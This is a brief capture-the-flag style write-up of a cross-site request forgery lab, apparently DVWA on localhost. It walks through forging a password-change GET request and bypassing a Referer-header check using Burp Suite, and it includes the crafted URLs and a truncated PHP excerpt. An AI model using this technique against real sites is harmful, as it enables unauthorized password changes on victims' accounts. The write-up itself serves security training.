### Objective

Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.

Looks like the parameters are still in the URL, let's try if we can still abuse that.
```txt
http://localhost:5000/vulnerabilities/csrf/?password_new=444&password_conf=444&Change=Change#
```
Response
```txt
That request didn't look correct.
```
Looks like something is checking it.
Let's view the source code.
```php
`if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf`
```
Let's fire up burp suite.
Let's change our password again and intercept the request.
Basically we have to be referred from our last login so let's say I want to change my password from 1234 to 12345
So my Referer header must be:
```html
Referer: http://localhost:5000/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change
```
Since we came from that page, now we can set the GET request to the new one.
```html
GET /vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change
```
Try logging out and in to see if it works.

